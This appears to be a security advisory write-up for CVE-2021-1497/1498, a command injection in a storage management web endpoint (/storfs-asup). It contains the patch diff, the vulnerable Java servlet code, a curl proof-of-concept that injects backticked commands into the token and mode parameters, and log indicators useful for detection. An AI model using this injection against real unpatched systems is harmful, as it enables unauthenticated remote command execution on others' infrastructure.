CVE-2021-1497 and/or CVE-2021-1498

Command injection in the /storfs-asup endpoint’s token and mode parameters.

Patch

--- unpatched/web.xml	2021-05-17 19:06:17.000000000 -0500
+++ patched/web.xml	2021-05-17 19:06:23.000000000 -0500
@@ -69,17 +69,6 @@
 	</servlet-mapping>

 	<servlet>
-		<servlet-name>Springpath Storfs ASUP</servlet-name>
-		<servlet-class>com.storvisor.sysmgmt.service.StorfsAsup</servlet-class>
-		<load-on-startup>1</load-on-startup>
-	</servlet>
-
-	<servlet-mapping>
-		<servlet-name>Springpath Storfs ASUP</servlet-name>
-		<url-pattern>/storfs-asup/*</url-pattern>
-	</servlet-mapping>
-
-	<servlet>
 		<servlet-name>Springpath Upgrade Image Upload Service</servlet-name>
 		<servlet-class>com.storvisor.sysmgmt.service.StorvisorFileUploader</servlet-class>
 	</servlet>

Vulnerability

  protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    String action = request.getParameter("action");
    if (action == null) {
      String msg = "Action for the servlet need be specified.";
      writeErrorResponse(response, msg);
      return;
    }
    try {
      String token = request.getParameter("token");
      StringBuilder cmd = new StringBuilder();
      cmd.append("exec /bin/storfs-asup ");
      cmd.append(token);
      String mode = request.getParameter("mode");
      cmd.append("  ");
      cmd.append(mode);
      cmd.append("  > /dev/null");
      logger.info("storfs-asup cmd to run : " + cmd);
      ProcessBuilder pb = new ProcessBuilder(new String[] { "/bin/bash", "-c", cmd.toString() });
      logger.info("Starting the storfs-asup now: ");
      long startTime = System.currentTimeMillis();
      Process p = pb.start();
      InputStream errStream = p.getErrorStream();
      String errMsg = FileUtils.readToString(errStream);
      int exitCode = p.waitFor();
      long timeTaken = System.currentTimeMillis() - startTime;
      logger.info("storfs-asup command completed in (" + timeTaken + " ) milliseconds, with exit code (" + exitCode + ") and error message: " + errMsg);
      errStream.close();
      OutputStream outStream = p.getOutputStream();
      outStream.flush();
      outStream.close();
      if (exitCode != 0)
        throw new Exception(errMsg);
    } catch (IOException ex) {
      logger.error("Failed to generate asup: " + ex);
    } catch (Exception ie) {
      logger.error("Failed to run the /bin/storfs-asup command.");
    } finally {
      logger.info("Done executing asup command. ");
    }
  }

PoC

wvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'
*   Trying 192.168.123.133...
* TCP_NODELAY set
* Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)
> POST /storfs-asup HTTP/1.1
> Host: 192.168.123.133
> User-Agent: curl/7.64.1
> Accept: */*
> Content-Length: 28
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 28 out of 28 bytes
< HTTP/1.1 200 OK
< Server: nginx/1.8.1
< Date: Tue, 18 May 2021 00:54:26 GMT
< Content-Length: 0
< Connection: keep-alive
< Front-End-Https: on
<
* Connection #0 to host 192.168.123.133 left intact
* Closing connection 0
wvu@kharak:~$

IOCs

==> /var/log/nginx/access.log <==
192.168.123.1 - - [17/May/2021:17:54:26 -0700] "POST /storfs-asup HTTP/1.1" 200 0 "-" "curl/7.64.1"

==> /var/log/springpath/stBootstrapGuiBackend.log <==
2021-05-18-00:54:26.012 [tomcat-http-2] INFO  com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id`  `id`  > /dev/null
2021-05-18-00:54:26.012 [tomcat-http-2] INFO  com.storvisor.sysmgmt.service.StorfsAsup.processRequest():64 - Starting the storfs-asup now:
2021-05-18-00:54:26.017 [tomcat-http-2] INFO  com.storvisor.sysmgmt.service.StorfsAsup.processRequest():71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory
2021-05-18-00:54:26.020 [tomcat-http-2] ERROR com.storvisor.sysmgmt.service.StorfsAsup.processRequest():89 - Failed to run the /bin/storfs-asup command.
2021-05-18-00:54:26.020 [tomcat-http-2] INFO  com.storvisor.sysmgmt.service.StorfsAsup.processRequest():91 - Done executing asup command.

==> /var/log/tomcat7/catalina.out <==
2021-05-18-00:54:26.012 INFO  com.storvisor.sysmgmt.service.StorfsAsup:59 - storfs-asup cmd to run : exec /bin/storfs-asup `id`  `id`  > /dev/null
2021-05-18-00:54:26.012 INFO  com.storvisor.sysmgmt.service.StorfsAsup:64 - Starting the storfs-asup now:
2021-05-18-00:54:26.017 INFO  com.storvisor.sysmgmt.service.StorfsAsup:71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory
2021-05-18-00:54:26.020 ERROR com.storvisor.sysmgmt.service.StorfsAsup:89 - Failed to run the /bin/storfs-asup command.
2021-05-18-00:54:26.020 INFO  com.storvisor.sysmgmt.service.StorfsAsup:91 - Done executing asup command.

==> /var/log/tomcat7/localhost_access_log.2021-05-17.txt <==
127.0.0.1 - - [17/May/2021:17:54:26 -0700] "POST /storfs-asup HTTP/1.0" 200 -